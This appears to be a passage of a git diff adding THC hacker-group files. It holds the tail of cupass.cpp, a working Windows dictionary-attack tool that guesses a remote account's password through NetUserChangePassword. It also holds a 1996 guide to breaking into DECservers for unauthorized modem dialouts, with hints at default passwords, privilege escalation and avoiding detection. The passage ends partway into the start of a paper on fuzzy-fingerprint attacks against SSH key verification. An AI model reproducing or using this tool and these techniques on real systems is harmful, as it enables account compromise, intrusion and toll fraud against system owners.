+               L"\nUsage: cupass \\\\hostname username dictionaryfile\n");
+            exit(1);
+        }
+
+
+        hostname = argv[1];
+        username = argv[2];
+        dictfile = argv[3];
+
+
+    if (wcsncmp(hostname, L"\\\\",2 )!=0)
+        {
+            wprintf (L"\nups... you forgot the double backslash?");
+            wprintf (
+                L"\nUsage: cupass \\\\hostname username dictionaryfile\n");
+            exit(1);
+        }
+
+
+  if( (stream  = _wfopen( dictfile, L"r" )) == NULL )
+        {
+      wprintf( L"\nups... dictionary %s could not be opened", dictfile );
+      wprintf (L"\nUsage: cupass \\\\hostname username dictionaryfile\n");
+        }
+   else
+   {
+        
+        wprintf (L"\n*** CUPASS 1.0 - Change User PASSword - by Doc Holiday/THC (c) 2001 ***\n");
+        wprintf (L"\nStarting attack .....\n");
+        wprintf (L"\nTarget: %s ", hostname);
+        wprintf (L"\nUser: %s\n ", username);
+
+
+        while( !feof( stream ) )
+        {
+          fgetws (myChar, 256,stream);
+
+
+          if (myChar[wcslen(myChar)-1] == '\r') myChar[wcslen(myChar)-1] = '\0';
+          if (myChar[wcslen(myChar)-1] == '\n') myChar[wcslen(myChar)-1] = '\0';
+
+
+          oldpassword = myChar;
+   
+          wprintf( L"\nTrying password %s \n", oldpassword );
+                
+          result = NetUserChangePassword( hostname, username,oldpassword, oldpassword );
+                
+          switch (result)
+          {
+                case 0: 
+                        wprintf( L"GOTCHA!! Password was changed\n" );
+                        wprintf( L"\nPassword from user '%s' is '%s'\n", username, oldpassword);
+                        fclose (stream);
+                        exit (1);
+                        break;
+                        
+                case 5: //ERROR_ACCESS_DENIED
+                        wprintf (L"Attempt failed -> ERROR_ACCESS_DENIED - But password could be %s\n", oldpassword);
+                        fclose (stream);
+                        exit(1);
+                        break;
+                        
+                case 86: //ERROR_INVALID_PASSWORD
+                        wprintf( L"Attempt failed -> Incorrect password\n" );
+                        break;
+                        
+                case 1351: //ERROR_CANT_ACCESS_DOMAIN_INFO 
+                        wprintf (L"Attempt failed -> Can't establish connection to Host %s\n",hostname);
+                        fclose (stream);
+                        exit(1);
+                        break;
+
+
+                case 1909: //ERROR_ACCOUNT_LOCKED_OUT
+                        wprintf (L"Attempt failed -> Account locked out\n");
+                        fclose (stream);
+                        exit(1);
+                        break;
+
+
+                case 2221: //NERR_UserNotFound) 
+                        wprintf (L"Attempt failed -> User %s not found\n", username);
+                        fclose (stream);
+                        exit(1);                   
+                        break;
+                        
+                case 2226://NERR_NotPrimary
+                        wprintf (L"Attempt failed -> Operation only allowed on PDC\n");
+                        break;
+
+
+                case 2245:
+                        wprintf (L"GOTCHA!! Password is '%s' , but couldn't be changed to '%s' due to password policy settings!\n", oldpassword, oldpassword);
+                        fclose(stream);
+                        exit(1);
+                        break;
+
+
+                default:
+                        wprintf( L"\nAttempt failed :( %lu\n", result );
+                        fclose(stream);
+                        exit(1);
+                        break;
+                }
+        }
+        fclose (stream); 
+   }    
+}
+<--> end cupass.cpp
+
+|=[ EOF ]=---------------------------------------------------------------=|
+

Papers/dec-serv.txt

@@ -0,0 +1,257 @@
+   Global OutDials on DECservers                  - Italy -   May 1996
+   by Zhart/THC
+
+                   
+þ Finding a DECserver
+
+ The DECserver is a terminal server, it connects its terminals to
+ hosts available on an Ethernet Local Area Network.
+ DecServers are usually reachable via telnet and sometimes via dialup.
+ Via telnet you need to scan/search for them in the internet,
+ Via dialups use a good Carrier Scanner like ToneLoc or THC-Scan.
+
+Telnet:
+ About telnet connection decservers have normal ip addresses,
+ but what we are interested in is the alpha address, 'cause almost always
+ it starts with "DS"; just something like:
+      DS7001.fuck.you.asshole
+ and if the owners are very very lame it can even contain the
+ string "MODEM" or "DIAL" (wow!) in its alpha address.
+ So what I suggest is to combine a brute force scanning with an intelligent
+ (smart) behaviour...
+ You should first find a route ip address of a university or of a science
+ research network or whatelse you (and, after some scanning, your experience)
+ think could have such a beautiful device.
+ It should be a network big enough to have several vaxes and other machines...
+ Note that not always an alpha address starting with "DS"
+ leads to a DECserver , i.e. sometimes ultrix machines have an address
+ like that.
+[I personally made a script to scan subnets from XXX.XXX.0.0 to
+ XXX.XXX.255.255 or from XXX.XXX.XXX.0 to XXX.XXX.XXX.255
+ and to save only interesting alpha addresses,
+ but i don't suggest to use it automatically, in other words
+ take it always under control and use your brain!]
+
+ þ Warning: usually scripts like this do a lot of noise;
+            think about "lastcomm" "ps" and things like that ...
+ þ Warning: to do subnet scanning you need an host with a very fast connection
+ þ Warning: CERT SUX !!!!!!   ;)
+
+ NOTE: 
+ instead of a script it's wiser to do a zone transfer (for example with
+ nslookup or dig) to get all the alpha names in a domain. But this needs
+ a) an skilled unix user and b) the target DNS server must allow zone
+ transfers. (There are other methods but this article isn't about unix
+ hacking ;-) So I only present this better possiblity which not many can
+ do reading this article.
+
+
+Dialup:
+ Nothing much to say about scanning these ... just do a fast carrier scan
+ of an area overnight and hope you get a dec-server. If you know that a
+ company has got dialups and a big computer network, then try to scan
+ those local numbers. There aren't much on toll free numbers and those
+ are usually more protected.
+
+ If you connect via dialup, you have no problem to recognize it:
+_______________________________________________________________________________
+
+DECserver 700-08 Communications Server V1.1 (BL44G-11A) - LAT V5.1
+DPS502-DS700
+
+(c) Copyright 1992, Digital Equipment Corporation - All Rights Reserved
+
+Please type HELP if you need assistance
+
+Enter username> THC
+
+Local>
+
+------------------------------------------------[FROM alt.2600/#hack.FAQ]------
+
+
+ But if you connect via telnet it will not appear anything on your screen:
+
+-------------------------[Start Capture]---------------------------------------
+
+telnet> open ds7001.fuck.you.asshole
+Trying 123.45.678.910 ...
+Connected to ds7001.fuck.you.asshole
+Escape character is '^]'.
+
+---------------------------[End Capture]--------------------------------------
+
+
+ All you have to do is just press enter (it's easy uh?), and it will
+ appear a "#" prompt (at this time you are quite sure it's a DECserver),
+ echo gets off and ...
+ now comes the time to type the password to enter the DEC ...
+ I won't tell you the default pwd (which in 99% of my times was the good one)
+ 'cause .... 'cause shit ! Do I have to tell you everything??? (scan!)
+ It's a very very lame password usually one of the firsts that you could think
+ of. You have 3 tries, after that it disconnects you. I don't know if there are
+ warnings or logs of wrong attempts made, but can tell that IF the password is
+ not the default one, then the system administrators take care about security
+ very very much, so be careful.
+ Typing the right password appears the same screen of the first capture
+ (look up!), you are asked a username but it isn't of any importance, just
+ type something unsuspicious like just one letter.
+
+
+þ Once in ... let's find out if there's a modem !
+
+ The "Local> " prompt is the DECserver prompt , I strongly suggest to give a
+ "help" command 'cause the dec help is very kind and it will tell you
+ more interesting things you can imagine... and you should learn from practice,
+ not reading shitty articles like this one from zines <g> !
+ Ok, to have an idea of where you are , there are two commands :
+ "show users"
+ "show services"
+ The second one will tell you all the possible connections:
+
+
+---------------------[Start Capture]-------------------------------------------
+Local> show services
+
+Service Name        Status       Identification
+AXPXXS              Available    DEC OSF/1 Version V3.2 LAT SERVICE
+AXPXX1              Available    @sys$manager:XXXXXXXX_axp.txt
+AXPXX2              Unknown      DEC OSF/1 Version V3.0 LAT SERVICE
+AXPXX3              Available     ALPHA 3000/400 - XXXXXX IV - XXX
+AXPXX5              Available     ALPHA 3000/400 - XXXXXX II - XXX
+AXPXX6              Available     ALPHA 3000/300 - XXXXXX IV/XXXXX - XXX
+AXPXX7              Available     ALPHA 3000/300 - C.S. - XXX
+AXPXX8              Available     DEC 200 4/166 - XXXXXX III - XXX
+AXPXX9              Available     DEC 200 4/166 - VETOR_1 - XXX
+AXPXXA              Available     DEC 200 4/166 - VETOR_2 - XXX
+AXPXXB              Available           DEC 400 4/233 -  G. XXXXXX
+AXPXXC              Unknown       DEC 200 4/166 - AXX - XXX
+AXPXXD              Available     DEC 200 4/166 - AXX - XXX
+XXXXXXX             Available    ULTRIX 4.3 (RISC)
+XXXXXXXX            Available           MV3100-M76   XXXX-XXX   XXXX2
+XXXXXX              Available           VS3100-M76 - C. XXXXXXX
+XXXXXX              Available    XXXXserver 310 XXXXXXXXXXXXXXXXX
+MVCB0               Unknown             VS 2100 - XXXXX
+MVCBCT              Available           XXXX cluster - VAX/VMS V5.5
+MXXXX2              Available           VS3100 - XXX Server Decnet-XXX
+MXXXX7              Available           MV3100-M76 - XXXXXXXXXXXXXXXXX
+MVXXX8              Available           Welcome to VAX/VMS V5.5-2
+MVXXX4              Available           VS3100-M76 - Disk server-
+MX31CS              Available           Welcome to VAX/VMS V5.5-2
+SATCS3              Available           MV3100-M76 - X.X.
+XXXXXE              Unknown      DEC OSF/1 Version V3.0 LAT SERVICE
+VAXXXX              Available    @SYS$MANAGER:XXXXXXX.TXT
+VS31C1              Unknown             Welcome to VAX/VMS V5.5-2
+VS40C6              Available           Welcome to VAX/VMS V5.5-2
+VSXX12              Unknown             VS3100 - X. XXXXXX
+VSXX11              Available           VS2000 - S. XXXXXXXXXXXX
+VXXX12              Available           VS 2000/50 - XXXXXXS
+VX31CS              Available           Welcome to VAX/VMS V5.5-2
+----------------------------------[End Capture]-------------------------------
+
+
+ Reading the description or the service name it's easy to find out a modem.
+ If you find it, let's say its name is "DS1MODEM" , you just have to use
+ the "connect" command:
+
+-------------------------[Start Capture]---------------------------------------
+
+Local> connect DS1MODEM
+Local -010- Session 1 to DS1MODEM on node DS7001 established
+atz
+OK
+atdt004969823282
+CONNECT 14400/REL
+Press [ENTER] to access L.o.r.E. BBS
+
+-------------------------[End Capture]-----------------------------------------
+
+
+þ ... A little bit difficult
+
+ If from the "show services" doesn't seem to be any modem (try also strange
+ services and services without description) don't lose any hope 'cause often
+ devices such as modems are used only by sys-administrators, they create the
+ service when they need it and then "CLEAR" it.
+ What you have to do is look all the PORTS of the DECserver for modems ...
+ Here you use the "SHOW PORT" command:
+
+--------------------------[Start Capture]--------------------------------------
+
+Local> show port 8
+
+Port  8:                               Server: DSLE8
+Character Size:            8           Input Speed:               9600
+Flow Control:            XON           Output Speed:              9600
+Parity:                 None           Signal Control:        Disabled
+Stop Bits:           Dynamic           Signal Select:  CTS-DSR-RTS-DTR
+Access:                Local           Local Switch:              None
+Backwards Switch:       None           Name:                    PORT_8
+Break:                 Local           Session Limit:                4
+Forwards Switch:        None           Type:                      Ansi
+Default Protocol:        LAT
+Preferred Service: VAXXX
+Authorized Groups:   0
+(Current)  Groups:   0
+Enabled Characteristics:
+Autobaud,  Autoprompt,  Broadcast,  Input Flow Control,  Lock,
+Loss Notification,  Message Codes,  Output Flow Control,  Verification
+
+
+-------------------------------[End Capture]-----------------------------------
+
+ All of these informations are interesting but the one which usually tells
+ if a modem is connected to the port is:
+
+Enabled Characteristics:
+Dialup, etc..., etc..., etc,...
+
+ So give a look at all ports, if there's nothing interesting throw that DEC
+ in the trash ,otherwise you NEED PRIVELEGES to use the modem ...
+ In 50% of cases the password to become privileged user is the default one,
+ in 85% of cases it's a lame one ...
+ Once again I won't tell you the privileged user default password (which is
+ different from the first password) but once again I say it's an absolutely
+ lame pwd!
+ To become Privileged user do:
+
+Local> set priv
+Password>
+
+ Once again have 3 tries ,but this time I'm sure that an invalid attempt
+ is logged with a certain warning value!
+ If after you've typed the pwd it answers with the "Local>" prompt it
+ means you're a privileged user , and finally you can do :
+
+Local> set port 1 service FUCKYOU
+Local> connect FUCKYOU
+
+ And enjoy your dialout ;)
+
+
+þ Epilogue
+
+ There's a lot to learn about DECservers, about all the settings and options
+ you can switch, so experiment ... they are useful to penetrate systems
+ and can tell you very much about a network ... lot of DECs have also
+ an active telnet command ...
+
+ And you can often find valid telnet targets with the command "show domain".
+ So these DECservers can also be useful to pass a Firewall (!) and to enter
+ internal networks which would normally not available (not connected to
+ the internet) !  But this once again goes to far into unix hacking ...
+
+ But be careful do not abuse too much, use your brain ...
+ Think that sooner or later a phone bill arrives to someone and ....
+ Use modem outdials only in hours when you know offices and machines' rooms
+ are closed ...
+
+Greets and Have Fun!
+ANARCHY ALL OVER THE WORLD !!!!!!!!
+To All Italian H/P scene doods: We need to be united !
+                                Leave me a message on
+                                LorE BBS +49-69-823282
+                                Login: THC  Pwd: THC
+
+ Zhart/THC
+

Papers/ffp-talk.html

@@ -0,0 +1,33 @@
+<HTML>
+<HEAD>
+<META HTTP-EQUIV="Refresh" CONTENT="1;URL=ffp-talk/index.html"> 
+</HEAD>
+<BODY BGCOLOR="WHITE">
+<BR><BR><BR>
+<CENTER>
+Redirecting to the presentation slides<BR>
+<B>"Unscharfe kryptographische Fingerabdr&uuml;cke"</B>
+</CENTER>
+</BODY>
+</HTML>
+                                                                                                                                                          
+                                                                                                                                                                                                                                                                                                                    
+                                                                                                                                                                                                                                                                                                                    
+                                                                                                                                                          
+                                                                                                                                                                                                                                                                                                                    
+                                                                                                                                                                                                                                                                                                                    
+                                                                                                                                                                                                                                                                                                                    
+                                                                                                                                                          
+                                                                                                                                                          
+                                                                                                                                                                                                                                                                                                                    
+                                                                                                                                                                                                                                                                                                                    
+                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
+                                                                                                                                                          
+                                                                                                                                                                                                                                                                                                                    
+                                                                                                                                                                                                                                                                                                                    
+                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
+                                                                                                                                                          
+                                                                                                                                                                                                                                                                                                                    
+                                                                                                                                                                                                                                                                                                                    
+                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
+                                                                                                                                                          

Papers/ffp.html

@@ -0,0 +1,1012 @@
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
+        "http://www.w3.org/TR/html4/loose.dtd">
+<html>
+<meta name="GENERATOR" content="TtH 3.44">
+ <style type="text/css"> div.p { margin-top: 7pt;}</style>
+ <style type="text/css"><!--
+ td div.comp { margin-top: -0.6ex; margin-bottom: -1ex;}
+ td div.comb { margin-top: -0.6ex; margin-bottom: -.6ex;}
+ td div.hrcomp { line-height: 0.9; margin-top: -0.8ex; margin-bottom: -1ex;}
+ td div.norm {line-height:normal;}
+ span.roman {font-family: serif; font-style: normal; font-weight: normal;} 
+ span.overacc2 {position: relative;  left: .8em; top: -1.2ex;}
+ span.overacc1 {position: relative;  left: .6em; top: -1.2ex;} --></style>
+
+    
+   <title>
+       Fuzzy Fingerprints -
+       Attacking Vulnerabilities in the Human Brain
+   </title>
+   <body bgcolor="white">
+   <table width="640" align="center">
+   <tr><td> 
+   <br><br>
+
+
+<title> 
+   Fuzzy Fingerprints\
+   Attacking Vulnerabilities in the Human Brain</title>
+    
+<h1 align="center">
+   Fuzzy Fingerprints<br />
+   Attacking Vulnerabilities in the Human Brain </h1>
+
+<h3 align="center">Plasmoid (plasmoid@thc.org) <br />
+        On behalf of The Hacker's Choice - <a href="http://www.thc.org">http://www.thc.org</a> </h3>
+
+   <p align="center">
+   This document is also available in the Portable Document Format
+   [PDF]: <a href="ffp.pdf">ffp.pdf</a>
+   </p> 
+<br><br>
+
+<div class="p"><!----></div>
+
+<h1>Contents </h1><a href="#tth_sEc1"
+>1&nbsp; Introduction</a><br />
+<a href="#tth_sEc2"
+>2&nbsp; Theoretical background</a><br />
+&nbsp;&nbsp;&nbsp;&nbsp;<a href="#tth_sEc2.1"
+>2.1&nbsp; Key exchange using public-key cryptography</a><br />
+&nbsp;&nbsp;&nbsp;&nbsp;<a href="#tth_sEc2.2"
+>2.2&nbsp; Cryptographic fingerprints for key verification</a><br />
+&nbsp;&nbsp;&nbsp;&nbsp;<a href="#tth_sEc2.3"
+>2.3&nbsp; Fuzzy fingerprint quality</a><br />
+&nbsp;&nbsp;&nbsp;&nbsp;<a href="#tth_sEc2.4"
+>2.4&nbsp; Finding fuzzy fingerprints</a><br />
+&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a href="#tth_sEc2.4.1"
+>2.4.1&nbsp; Tweaking RSA key generation</a><br />
+&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a href="#tth_sEc2.4.2"
+>2.4.2&nbsp; Tweaking DSA key generation</a><br />
+<a href="#tth_sEc3"
+>3&nbsp; Implementation details</a><br />
+&nbsp;&nbsp;&nbsp;&nbsp;<a href="#tth_sEc3.1"
+>3.1&nbsp; Installation of <tt>ffp</tt></a><br />
+&nbsp;&nbsp;&nbsp;&nbsp;<a href="#tth_sEc3.2"
+>3.2&nbsp; Usage of <tt>ffp</tt></a><br />
+&nbsp;&nbsp;&nbsp;&nbsp;<a href="#tth_sEc3.3"
+>3.3&nbsp; Sample session using <tt>ffp</tt> and SSHarp</a><br />
+&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a href="#tth_sEc3.3.1"
+>3.3.1&nbsp; Investigating the victim host</a><br />
+&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a href="#tth_sEc3.3.2"
+>3.3.2&nbsp; Generating a key pair with a good fuzzy fingerprint</a><br />
+&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a href="#tth_sEc3.3.3"
+>3.3.3&nbsp; Launching <tt>ssharp</tt> with the generated keys</a><br />
+<a href="#tth_sEc4"
+>4&nbsp; Thanks and greetings</a><br />
+
+  
+
+<div class="p"><!----></div>
+   <h2><a name="tth_sEc1">
+1</a>&nbsp;&nbsp;Introduction</h2>
+
+<div class="p"><!----></div>
+Welcome to the world of <em>Fuzzy Fingerprinting</em>, a new technique to
+attack cryptographic key authentication protocols that rely on human
+verification of key fingerprints. It is important to note that while fuzzy
+fingerprinting is an attack against a protocol, it is <em>not</em> a
+cryptographic attack and thus does not attack any cryptographic algorithm.
+
+<div class="p"><!----></div>
+This document covers the theoretical background and the generation of fuzzy
+fingerprints and also details on the  implementation <tt>
+ffp</tt> [<a href="#ffp" name="CITEffp">FFP</a>] and its usage. For people who don't want to waste their time
+reading pseudo-academic Blabla it is essential to skip to the more pratical
+part of this document <a href="#ri">3</a>, the details on the  implementation
+and the provided sample session using SSHarp [<a href="#sfp" name="CITEsfp">SFP</a>].
+
+<div class="p"><!----></div>
+ <h2><a name="tth_sEc2">
+2</a>&nbsp;&nbsp;Theoretical background</h2>
+
+<div class="p"><!----></div>
+     <h3><a name="tth_sEc2.1">
+2.1</a>&nbsp;&nbsp;Key exchange using public-key cryptography</h3>
+
+<div class="p"><!----></div>
+Asymmetric cryptography has revolutionized the classic cryptography and
+created new cryptographic techniques such as hybrid cryptosystems or digital
+signatures. In order to cover the background of fuzzy fingerprinting, this
+document focuses on the hybrid cryptosystems and their key exchange
+protocols. Fuzzy fingerprinting may also have an impact on digital
+signatures or integrity verification systems, for now we simply ignore these
+aspects.
+
+<div class="p"><!----></div>
+Let's introduce the classical problem of communicating using a symmetric
+cypher. Two parties that want to encrypt a communication using a fast
+symmetric cipher need to exchange a secret session key before starting to
+communicate. This problem is not easy to solve, meeting in real life or
+exchanging the session key via telephone are solutions, but often 
+impossible to realize.
+
+<div class="p"><!----></div>
+Using public-key cryptography both parties can elegantly and securely
+exchange the session key: Both parties first exchange their public keys,
+then one chooses a session key and transmits it to the other encrypting it
+with its public key. Both continue communicating using the session key. An
+outside attacker is not able to able to read the secret session key if he
+just passively eavesdrops the communication of both.
+
+<div class="p"><!----></div>
+While public-key cryptography looks like a really good solution to the
+problem, it introduces a new problem into the scenario. An active attacker
+might intercept the communication between both parties and replaces the
+transmitted public keys with his own public key. Both parties would exchange
+keys, but in fact each would receive the public key of the attacker. Any
+communication first goes to the attacker who decrypts the messages using his
+private key and then re-encrypts them using the target's public key.  He's
+now able to read the session key in cleartext and can also read the
+following secure communication that uses this session key. This attack is
+known as <em>man-in-the-middle attack</em>.
+
+<div class="p"><!----></div>
+     <h3><a name="tth_sEc2.2">
+2.2</a>&nbsp;&nbsp;Cryptographic fingerprints for key verification</h3>
+
+<div class="p"><!----></div>
+Several protocols have been proposed to prevent man-in-the-middle attacks
+when using public-key cryptography, e.g. the interlock protocol [<a href="#ilp" name="CITEilp">ILP</a>].
+Other protocols rely on digital signatures or trusted key distribution
+centers to verify the integrity of the public keys. Unfortunately in most
+situation such methods are not available and the initially exchanged public
+keys are verificated using so called <em>cryptographic fingerprints</em>.
+
+<div class="p"><!----></div>
+Cryptographic fingerprints (also called messages digests) are short blocks
+generated by cryptographic one-way hash functions (also called
+collision-free hash functions). These cryptographic fingerprints act similar
+to real fingerprints, if two fingerprints match it is <em>very</em> likely that
+they have been made by the same person. In order to verify the integrity of
+a public key the sender and receiver both generate a cryptographic
+fingerprint from the key and compare these fingerprints, e.g. by phone.
+
+<div class="p"><!----></div>
+The longer a fingerprint is, the better is its security against collisions
+but the harder it is for a common human subject to compare the fingerprint
+against another fingerprint. It has been observed that most people tend to
+compare only a sequence at the start and at the end of the fingerprint
+instead of checking every single digit. Some more sophisticated human
+subjects also compare a sequence in the middle - but only very few have been
+spotted that compare all digits. This observation led to the idea of 
+fuzzy fingerprints.
+
+<div class="p"><!----></div>
+     <h3><a name="tth_sEc2.3">
+2.3</a>&nbsp;&nbsp;Fuzzy fingerprint quality</h3>
+
+<div class="p"><!----></div>
+The intention of fuzzy fingerprinting is no to collide against a target
+fingerprint, but to find a fuzzy fingerprint that would pass lazy human
+comparison. This attack has been proposed by Plasmoid and Skyper in 
+a private discussion at HAL2001.
+
+<div class="p"><!----></div>
+There are some methods for the generation of fuzzy fingerprints. The most
+basic is the <em>fuzzy map weighting</em> that was introduced by Plasmoid.
+
+<div class="p"><!----></div>
+Each digit of a cryptographic fingerprint is weighted according to a map of
+importance. The weights range from 0 to 1 and represent the importance for a
+comparison, so that first and last digits have a higher importance than
+middle ones. If a digit of the fuzzy fingerprint and the target
+fingerprint match the weight is added to the quality of the fuzzy
+fingerprint. The sum of the weighted digits is the quality of the fuzzy
+fingerprint and equal fingerprints have a quality of 1 or 100
+<div class="p"><!----></div>
+In order to imitate the natural laziness an inverse gaussian distribution
+could be used to generate the fuzzy map. The following example shows an
+inverse gaussian distribution for a small 2 byte fingerprint.
+
+<div class="p"><!----></div>
+
+<table>
+<tr><td align="right">Target Fingerprint </td><td align="center">= </td><td align="center">9   </td><td align="center">F   </td><td align="center">:</td><td align="center">2   </td><td align="center">3  </td></tr>
+<tr><td align="right">Fuzzy Map </td><td align="center">= </td><td align="center">25% </td><td align="center">10% </td><td align="center">:</td><td align="center">5% </td><td align="center">20% </td></tr>
+<tr><td align="right"></td></tr>
+<tr><td align="right">Fuzzy Fingerprint </td><td align="center">= </td><td align="center">9   </td><td align="center">3   </td><td align="center">:</td><td align="center">1   </td><td align="center">3  </td><td align="center"></td></tr>
+<tr><td align="right">Quality </td><td align="center">= </td><td align="center">25% </td><td align="center">+ 10% </td><td align="center"></td><td align="center">+ 5% </td><td align="center">+ 20% </td><td align="center">= 45%  </td></tr></table>
+
+
+<div class="p"><!----></div>
+Eventhough only 2 digits of 6 are equal the calculated quality is near 50because the important digits at the start and at the end do match. At the
+first glance a gaussian distribution might be an overkill for such a simple
+map, but it allows the generation of variable-length maps that can be
+generated for several one-way hash functions, e.g. MD5 [<a href="#md5" name="CITEmd5">MD5</a>] with 16
+bytes fingerprints or SHA1 [<a href="#dss" name="CITEdss">DSS</a>] with 20 bytes fingerpints. 
+
+<div class="p"><!----></div>
+Instead of the gaussian distribution a cosine function might be used with 3
+maxima. This can be achieved if the map is generated within the interval 
+from <font face="symbol">-</font
+>2<font face="symbol">p</font
+> to 2<font face="symbol">p</font
+>. Important parts of the fingerprint therefore
+become the start, the end <em>and</em> the middle sequence.
+
+<div class="p"><!----></div>
+An extension for finding fuzzy fingerprints has been proposed by Heinrich
+Langos eventhough he probably can't remember that. In addition to the fuzzy
+map, a map of common key confusions is added to the quality calculation.
+Digits like 6 and 9 or 1 and 7 are often mixed up depending on the format of
+the digits, e.g. down written or graphic fonts. A <em>confusion key map</em>
+contains the confusion and a quality representing the probability of the
+confusion. The following example shows just a few confusions.
+
+<div class="p"><!----></div>
+
+<table>
+<tr><td align="center">Target Key  </td><td align="center"></td><td align="center">Fuzzy Key  </td><td align="center">Quality </td></tr>
+<tr><td align="center">6   </td><td align="center"><font face="symbol">®</font
+> </td><td align="center">9     </td><td align="center">12%  </td></tr>
+<tr><td align="center">9   </td><td align="center"><font face="symbol">®</font
+> </td><td align="center">6     </td><td align="center">12%  </td></tr>
+<tr><td align="center">1   </td><td align="center"><font face="symbol">®</font
+> </td><td align="center">7     </td><td align="center">8%  </td></tr>
+<tr><td align="center">7   </td><td align="center"><font face="symbol">®</font
+> </td><td align="center">1     </td><td align="center">4%  </td></tr></table>
+
+
+<div class="p"><!----></div>
+A confusion map adds more granularity to the quality function of fuzzy maps,
+fuzzy fingerprints generated with confusions maps not only contain similar
+start and end-sequences in comparison to the target fingerprint, but also
+feature digits that might easily be confused with digits from the target
+fingerprint.
+
+<div class="p"><!----></div>
+It is important to note that such a key mapping is not necessary symmetric
+and also that such a confusion key map has not been implemented in this
+release but may be added later.
+
+<div class="p"><!----></div>
+     <h3><a name="tth_sEc2.4">
+2.4</a>&nbsp;&nbsp;Finding fuzzy fingerprints</h3>
+
+<div class="p"><!----></div>
+With the fuzzy quality as an instrument to order fuzzy fingerprints, an
+attacker is able to search for fingerprints with the best fuzzy quality.
+This search involves two major calculation components, the one-way hash
+function and the key generation, because the attacker has to bruteforce for
+keys that have a good fuzzy fingerprint generated using a hash function.
+
+<div class="p"><!----></div>
+Cryptographic one-way hash functions are collision-resistant (or try to be),
+therefore changing just one bit of the input data should result in a
+complete different fingerprint (50issues into account, it should be very hard to predict the output of a hash
+function so that there would be any other way than bruteforcing to receive
+good fuzzy fingerprints. Any performance optimisations need to be done 
+in the key generation component. 
+
+<div class="p"><!----></div>
+For this document the RSA [<a href="#rsa" name="CITErsa">RSA</a>] and the DSA [<a href="#dss" name="CITEdss">DSS</a>] key generation
+have been reviewed. The intention was to improve the performance of the key
+generation under the new aspect that the resulting keys not necessary have
+to be cryptographic secure but still need to work.
+
+<div class="p"><!----></div>
+      <h4><a name="tth_sEc2.4.1">
+2.4.1</a>&nbsp;&nbsp;Tweaking RSA key generation</h4>
+
+<div class="p"><!----></div>
+The RSA algorithm uses the following interesting variables
+
+<ul>
+<li> p, q and n = pq, two strong prime numbers<br /><br /></li>
+
+<li> <font face="symbol">f</font
+>(n)=(p<font face="symbol">-</font
+>1)(q<font face="symbol">-</font
+>1)<br /><br /></li>
+
+<li> e with gcd(e,<font face="symbol">f</font
+>(n))=1, the public key<br /><br /></li>
+</ul>
+
+
+<div class="p"><!----></div>
+There are two possible approaches to the generation of an RSA key pair 
+
+<div class="p"><!----></div>
+
+<ul>
+<li> The first step is to randomly choose the public key e and continue to
+search for two prime numbers p and q so that p and q meet
+gcd(e,<font face="symbol">f</font
+>(n))=1 or in other words e and <font face="symbol">f</font
+>(n) are relative prime.
+This approach has been implemented by the OpenSSL Project [<a href="#ssl" name="CITEssl">SSL</a>].<br /><br /></li>
+
+<li> The other approach is to first calculate the two prime numbers p and
+q and then search for an e so that e meets gcd(e,<font face="symbol">f</font
+>(n))=1. This 
+approach is integrated in the <tt>ffp</tt> implementation [<a href="#ffp" name="CITEffp">FFP</a>].<br /><br /></li>
+</ul>
+
+
+<div class="p"><!----></div>
+While both approaches create the same result the second one better fits into
+the needs of bruteforcing, because the expensive prime number generations
+are only performed once. An attacker could calculate the two primes p
+and q at the start of the bruteforce process and then search successivly
+for public keys e.
+
+<div class="p"><!----></div>
+In order to improve the performance even the check for e being relative
+prime can be skipped, this is called <em>sloppy</em> key generation. While this
+step dramatically increases the performance, it is not guaranteed that the 
+generated keys still work. Test allow the assumption that only very few 
+keys are broken and if an attacker stores a list of best keys, e.g. 10 there
+is more than a fair chance that more than one key is working.
+
+<div class="p"><!----></div>
+      <h4><a name="tth_sEc2.4.2">
+2.4.2</a>&nbsp;&nbsp;Tweaking DSA key generation</h4> 
+
+<div class="p"><!----></div>
+The algorithm uses the following interesting variables
+
+<ul>
+<li> p, a prime number of variable length<br /><br /></li>
+
+<li> q, a 160-bit prime factor of p<font face="symbol">-</font
+>1<br /><br /></li>
+
+<li> x with x  &lt;  q, the private key<br /><br /></li>
+
+<li> g, something different [Do we need to discuss any detail?]<br /><br /></li>
+
+<li> y = g<sup>x</sup> mod p, the public key<br /><br /></li>
+</ul>
+
+
+<div class="p"><!----></div>
+<a name="slow-dsa">
+</a>Increasing the performance of the DSA key generation is a diffcult problem. 
+At the first step one would start the key generation process similar to 
+the improvements done to the sloppy RSA key generation by first 
+calculating the two prime numbers p and q. Note that p and q in
+case of DSA old more constraints than in the RSA algorithm.
+
+<div class="p"><!----></div>
+After two primes have been found, it is possible to bruteforce over the
+private key x that only needs to meed x  &lt;  q which is a simple and fast
+comparison. Unfortunatley it is necessary for each x to calculate the
+appropriate public key y which involves calculating a modulus and an
+exponentiation with very big numbers and thus is very time consuming.
+
+<div class="p"><!----></div>
+Tests with the <tt>ffp</tt> implementation show that DSA is about 1000 times
+slower than RSA key generation and therefore will only be available to the
+bruteforce process for fuzzy fingerprinting in the next centuries.
+
+<div class="p"><!----></div>
+ <h2><a name="tth_sEc3">
+3</a>&nbsp;&nbsp;Implementation details</h2>
+<a name="ri">
+</a>
+
+<div class="p"><!----></div>
+Now you have read through a rather strange description of the background and
+honestly I know that some points have been discussed far from complete,
+nevertheless I also like to present an implementation of the discussed ideas
+that is callesd <tt>ffp</tt> and available at The Hacker's Choice website. This
+implementation uses the fuzzy fingerprinting technique in order to attack
+the key verification protocol used in the client of SSH protocol version 2.
+As a good victim the implementation OpenSSH [<a href="#ssh" name="CITEssh">SSH</a>] has been chosen,
+because it is free and really good software that can mess with all
+commercial implementations (Humble me says so!). 
+
+<div class="p"><!----></div>
+OpenSSH makes use of the routines from the free crypto and SSL 
+libraries provided by the OpenSSL Project [<a href="#ssl" name="CITEssl">SSL</a>]. Therefore several
